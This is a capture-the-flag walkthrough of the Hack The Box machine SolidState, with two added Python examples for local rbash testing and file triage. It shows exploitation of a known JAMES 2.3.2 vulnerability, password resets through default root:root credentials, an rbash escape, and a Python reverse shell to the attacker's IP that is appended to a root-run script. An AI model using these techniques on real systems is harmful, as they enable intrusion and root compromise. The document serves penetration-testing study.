Hack The Box : SolidState
31 July, 2021
Starting off with a default nmap scan (top 1000 TCP ports):
# nmap -A -sC -sV -O -Pn 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.51
Host is up (0.40s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.174 [10.10.16.174]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/30%OT=22%CT=1%CU=37697%PV=Y%DS=2%DC=T%G=Y%TM=6103873
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=1
OS:05%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O
OS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 407.53 ms 10.10.16.1
2 203.89 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.27 seconds
None of the open ports gave me anything interesting on their own, so I searched for the versions above and found an exploit for Apache JAMES Server 2.3.2 (Exploit-DB 35513), an exact match. Reading the code, it needs the James Remote Administration Tool on port 4555. That port is not in the top 1000 the default scan covers, so I ran a second scan against it, and it was indeed open:
# nmap -A -sC -sV -O -Pn -p 4555 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-30 13:15 EDT
Nmap scan report for 10.10.10.51
Host is up (0.41s latency).
PORT STATE SERVICE VERSION
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.91%I=7%D=7/30%Time=610433AB%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.8 - 3.11 (94%), Linux 4.8 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.18 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 4555/tcp)
HOP RTT ADDRESS
1 363.03 ms 10.10.16.1
2 196.62 ms 10.10.10.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.92 seconds
Let's use the exploit. It logs in to the admin tool with the default root:root credentials, adds a mailbox whose name is a path traversal into /etc/bash_completion.d, then mails the payload to that mailbox over SMTP; the stored message is sourced by bash completion the next time someone opens an interactive shell (CVE-2015-7611).
# python2 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
The exploit used root:root as credentials, so I used the same to log in to port 4555 myself. The payload is only supposed to run when a user logs in, so I had changed it to a curl request for a file on my machine, but no such request ever arrived: nobody had logged in yet, and that is what the exploit needs to fire.
# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
So I looked around the admin tool instead. setpassword needs no knowledge of the old password, so I reset the users' mailbox passwords in order to read their mail over POP3 (noisy and destructive, but fine on a lab box):
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset
User
Reading Mindy's mailbox over POP3 (port 110) with the password I had just set, I found her SSH credentials:
# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
Using those credentials I was able to log in over SSH and read the user flag:
mindy@solidstate:~$ cat user.txt
<flag>
Root
mindy's login shell is rbash (restricted bash), so I wasn't allowed to use cd:
mindy@solidstate:~$ ls -ltrha
total 28K
-rw-r--r-- 1 root root 0 Aug 22 2017 .bash_logout
-rw-r--r-- 1 root root 1001 Aug 22 2017 .bashrc
-rw------- 1 root root 0 Aug 22 2017 .shosts
-rw------- 1 root root 0 Aug 22 2017 .rhosts
-rw-r--r-- 1 root root 338 Aug 22 2017 .bash_profile
-rw------- 1 mindy mindy 33 Nov 18 2020 user.txt
lrwxrwxrwx 1 root root 9 Nov 18 2020 .bash_history -> /dev/null
drwxr-x--- 2 mindy mindy 4.0K Apr 26 12:37 bin
drwxr-xr-x 4 root root 4.0K Apr 26 12:37 ..
drwxr-x--- 4 mindy mindy 4.0K Apr 26 12:37 .
drw------- 2 root root 4.0K Apr 26 12:37 .ssh
mindy@solidstate:~$ cd .ssh
-rbash: cd: restricted
The bin folder had three symbolic links
mindy@solidstate:~$ ls bin/
cat env ls
mindy@solidstate:~$ ls -ltrha bin/cat
lrwxrwxrwx 1 root root 8 Aug 22 2017 bin/cat -> /bin/cat
mindy@solidstate:~$ ls -ltrha bin/env
lrwxrwxrwx 1 root root 8 Aug 22 2017 bin/env -> /bin/env
mindy@solidstate:~$ ls -ltrha bin/ls
lrwxrwxrwx 1 root root 7 Aug 22 2017 bin/ls -> /bin/ls
mindy@solidstate:~$ bin/cat
-rbash: bin/cat: restricted: cannot specify `/' in command names
$PATH was pinned to mindy's bin directory, rbash refuses command names containing a /, and PATH itself is read-only in a restricted shell, so nothing beyond cat, env and ls was reachable:
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
Searching around the internet, I found a guide to escaping restricted shells: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf. The simplest option worked: ask sshd to run bash as the remote command, with -t so it gets a terminal. sshd hands that command to the login shell as `rbash -c bash`; a restricted shell may run any command found on its PATH, and the child bash is an ordinary process that inherits no restrictions. Note that $SHELL still reports /bin/rbash afterwards; it only records the login shell, not the shell you are actually in.
# ssh mindy@10.10.10.51 -t "bash"
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $SHELL
/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd bin
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ ls
cat env ls
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ cd /tmp
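Why the escape works can be reproduced locally. The following is an added example, not code from the page: `bash -r` enters the same restricted mode as a shell invoked as rbash, so the probes below show what rbash refuses, why a child bash is free, and how to tell which shell you are really in (the page's `echo $SHELL` still says rbash after the escape). It assumes bash is on PATH and contacts no target.

```python
#!/usr/bin/env python3
"""Added example: reproduce rbash's rules and the `ssh -t bash` escape locally.
`bash -r` enters the same restricted mode as a shell invoked as rbash.
Assumes bash is on PATH; nothing here touches the target."""
import subprocess


def run(cmd, restricted):
    """Run `cmd` in a fresh bash; restricted=True adds -r (rbash semantics).
    Returns (exit code, stdout, stderr), outputs stripped."""
    argv = ["bash", "-r", "-c", cmd] if restricted else ["bash", "-c", cmd]
    p = subprocess.run(argv, capture_output=True, text=True)
    return p.returncode, p.stdout.strip(), p.stderr.strip()


def rbash_blocks(cmd):
    """True if a restricted bash refuses `cmd` (non-zero exit)."""
    return run(cmd, restricted=True)[0] != 0


def escape_pwd():
    """The escape: a restricted shell may run any command found on PATH, and a
    child `bash` is an ordinary process that inherits no restrictions.
    `ssh -t mindy@host bash` makes sshd do exactly this via `rbash -c bash`.
    Returns the child's working directory after `cd /`, which rbash itself
    would refuse."""
    return run('bash -c "cd / && pwd"', restricted=True)[1]


def shell_mode(restricted):
    """How to tell which shell you are really in: $SHELL only records the login
    shell, whereas `shopt restricted_shell` reflects the running process."""
    cmd = "shopt -q restricted_shell && echo restricted || echo unrestricted"
    return run(cmd, restricted)[1]


if __name__ == "__main__":
    for probe in ("cd /tmp", "/bin/ls", "PATH=/usr/bin", "echo x > /tmp/probe", "true"):
        print(f"{probe!r:24} blocked={rbash_blocks(probe)}")
    print("escaped child pwd:", escape_pwd())
    print("restricted shell reports:", shell_mode(True))
    print("escaped shell reports:", shell_mode(False))
```

The redirect probe matters in practice: rbash also blocks `>`, `>>` and `&>`, so even with cat and env available you cannot write files from the restricted shell itself, only from the escaped child.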
I ran linpeas and saw an interesting entry in the output:
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
Let's check out this python script
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -ltrha
total 16K
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
drwxr-xr-x 3 root root 4.0K Aug 22 2017 .
drwxr-xr-x 22 root root 4.0K Apr 26 12:37 ..
drwxr-xr-x 11 root root 4.0K Apr 26 12:37 james-2.3.2
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
A root-owned, world-writable (777) script that cleans up /tmp looks like something root runs from cron. I tried my luck: if root executes it periodically, appending a reverse shell to it should give me a root shell.
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.174",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.51] 37060
root@solidstate:~# id
uid=0(root) gid=0(root) groups=0(root)
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
<flag>
It worked! A cleaner approach would have been to confirm with pspy that root actually runs this script, and how often, before modifying it, rather than trying my luck on a cleanup job.
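The two checks worth doing before appending to /opt/tmp.py, as an added example that is neither the page's code nor linpeas: list files that are world-writable but owned by someone else, then grep the usual cron locations for references to each. It builds a constructed fixture so it runs anywhere; the cron paths are Debian defaults and an assumption. Root's own crontab under /var/spool/cron/crontabs is unreadable to mindy, so an empty result is not evidence of absence, which is exactly the case pspy covers.

```python
#!/usr/bin/env python3
"""Added example: triage a writable, root-owned script before editing it.
Not the page's code and not linpeas. Finds regular files that are
world-writable and owned by someone else, then looks for references to a path
in the usual cron locations (Debian defaults, assumed). The fixture it builds
is constructed sample data, not taken from the target."""
import os
import stat
import tempfile

CRON_PATHS = [
    "/etc/crontab",
    "/etc/cron.d",
    "/etc/cron.hourly",
    "/etc/cron.daily",
    "/var/spool/cron/crontabs",
]


def world_writable_files(root, my_uid=None):
    """Regular files under `root` writable by everyone and not owned by my_uid."""
    my_uid = os.getuid() if my_uid is None else my_uid
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: judge the file, not a symlink's target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH and st.st_uid != my_uid:
                hits.append(path)
    return sorted(hits)


def cron_references(target, cron_paths=CRON_PATHS):
    """(file, line) pairs in cron files that mention `target`, comments excluded.
    Unreadable files and directories are skipped silently: an unprivileged user
    cannot read root's crontab, so an empty result proves nothing."""
    refs = []
    for p in cron_paths:
        if os.path.isdir(p):
            try:
                candidates = [os.path.join(p, f) for f in sorted(os.listdir(p))]
            except OSError:
                continue
        elif os.path.isfile(p):
            candidates = [p]
        else:
            continue
        for f in candidates:
            try:
                with open(f, errors="replace") as fh:
                    for line in fh:
                        line = line.strip()
                        if target in line and not line.startswith("#"):
                            refs.append((f, line))
            except OSError:
                continue
    return refs


def build_fixture():
    """Constructed sample: a 777 cleanup script like /opt/tmp.py, a 644 file,
    and a crontab line that runs the script as root every three minutes."""
    d = tempfile.mkdtemp(prefix="triage-")
    script = os.path.join(d, "tmp.py")
    with open(script, "w") as fh:
        fh.write("import os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(script, 0o777)
    quiet = os.path.join(d, "notes.txt")
    with open(quiet, "w") as fh:
        fh.write("nothing to see\n")
    os.chmod(quiet, 0o644)
    cron = os.path.join(d, "crontab")
    with open(cron, "w") as fh:
        fh.write("*/3 * * * * root python /opt/tmp.py\n")
        fh.write("# */3 * * * * root python /opt/old.py\n")
    return d, script, cron


if __name__ == "__main__":
    for hit in world_writable_files("/opt"):
        print("world-writable, not mine:", hit)
        for f, line in cron_references(hit):
            print("  scheduled in", f, ":", line)
```

Run on the target it would flag /opt/tmp.py from the listing above but find no readable cron entry for it, which is the point: the file's permissions say "tamper here", the readable cron files say nothing, and only a process watcher such as pspy settles who runs it and when.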